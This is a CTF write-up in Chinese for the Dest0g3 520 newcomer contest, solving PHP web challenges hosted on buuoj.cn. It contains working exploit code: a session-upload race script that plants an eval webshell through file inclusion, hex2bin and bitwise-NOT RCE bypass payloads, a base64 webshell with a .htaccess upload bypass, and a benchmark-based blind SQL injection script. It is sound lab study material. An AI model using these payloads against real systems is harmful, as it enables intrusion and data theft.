Dest0g3 520迎新賽

這兩天期末，發點存貨
phpdest
文件競爭

import requests
import io
import threading
url = "http://a44e2fb2-5cb3-4f96-a03f-9657dedc9a39.node4.buuoj.cn:81/"
sessionID = "flag"
data = {
    "cmd": "system('cat flag.php');"}
def write(session):
    while True:
        f = io.BytesIO(b'a'*1024*50)
        resp = session.post(url=url,data={
    'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST["cmd"]);?>'},files={
    'file':('flag.txt',f)},cookies={
    'PHPSESSID':sessionID})
def read(session):
    while True:
        resp = session.post(url='http://a44e2fb2-5cb3-4f96-a03f-9657dedc9a39.node4.buuoj.cn:81/?file=/tmp/sess_flag',data=data)
        if 'flag.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("=========retry==========")
if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1,5):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(1,5):
            threading.Thread(target=read, args=(session,)).start()
    event.set()

EasyPHP

set_error_handler(
    function() use(&$fl4g) {
    
        print $fl4g;
    }

數報錯然後輸出 flag
ctf[]=123

SimpleRCE
hex2bin 繞過
https://www.pudn.com/news/62809145ebb030486d479342.html
可以看一下，裏面有
最後執行的是
aaa=hex2bin('73797374656d')('head /f*')；

另一種方法
法二
最開始考慮的是無字母 rce，但發現或和异或都被 ban 了所以考慮—url取反繞過

<?php

fwrite(STDOUT,'[+]your function: ');

$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));

fwrite(STDOUT,'[+]your command: ');

$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));

echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
payload
aaa=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%D5);

funny_upload
對文件類型進行了檢測，改為jpg文件後，又對文件內容進行了檢測不能有<?，所以采用了base64結合.htaccess偽協議的方式進行繞過

1.jpg
PD9waHAgZXZhbCgkX1BPU1RbYV0pOz8+
.htaccess
SetHandler application/x-httpd-php
php_value auto_append_file "php://filter/convert.base64-decode/resource=1.jpg

上傳成功後蟻劍鏈接即可
Really Easy SQL
sql盲注,sleep被過濾，用benchmark

import requests
import time
url="http://fec87fc0-85b0-4969-a9d2-7328b18dc98b.node4.buuoj.cn:81/"
flag=''
for i in range(1,50):
    m=32
    n=127
    while 1:
        mid=(m+n)//2

        #payload="0'or(if((ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1))<{}),benchmark(2000000,md5(1)),0))or'".format(i,mid) #flaggg,user
        #payload="0'or(if((ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='flaggg')),{},1))<{}),benchmark(2000000,md5(1)),0))or'".format(i,mid) #cmd
        payload="0'or(if((ascii(mid((select(cmd)from(flaggg)),{},1))<{}),benchmark(2000000,md5(1)),0))or'".format(i,mid)
        data={
    
        'username': 'a',
        'password': payload
        }
        print(data)
        try:
           r = requests.post(url=url,data=data,timeout=1.5)
           m=mid
        except:
            n=mid
        if(m+1==n):
            flag+=chr(m)
            print(flag)
            break
        time.sleep(0.2)
    time.sleep(1)